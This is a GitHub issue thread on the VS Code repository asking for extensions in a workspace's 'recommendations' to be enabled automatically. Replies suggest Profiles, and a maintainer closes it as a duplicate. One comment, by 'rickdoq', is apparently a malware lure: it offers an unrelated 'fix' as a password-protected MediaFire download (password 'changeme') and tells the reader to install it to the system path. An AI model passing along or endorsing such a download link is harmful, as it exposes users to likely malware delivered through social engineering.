### ISSUE TITLE
Automatically enable extension for workspace if in "recommendations"

### ISSUE THREAD

**Issue by Fuzzyma** [microsoft/vscode#227275]
I often disable extensions I don't use regularly to optimize startup time for my vscode.
I then go ahead and enable them in the workspaces I actually need them in.

It would be cool, if extensions would be enabled automatically for a workspace when they are listed in the "recommendations" (ofc only if they are installed and disabled).
I often end up wondering why some lsp is not working even tho its just an extension that I forgot to enable.

This behavior could be disabled by default to not break current behavior and enabled via user config

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by IllusionMH** [comment]
Have you tried Profiles feature, that keeps list of installed/enabled extensions and tied to workspace.

https://code.visualstudio.com/docs/editor/profiles#_workspace-associations

**Comment by Fuzzyma** [comment]
Well I can't possibly have a Profile for every project I encounter with a different set of recommendations.
For my own projects it would simplify it, that's right.

**Comment by sandy081** [comment]
/duplicate

There is already a similar feature request.
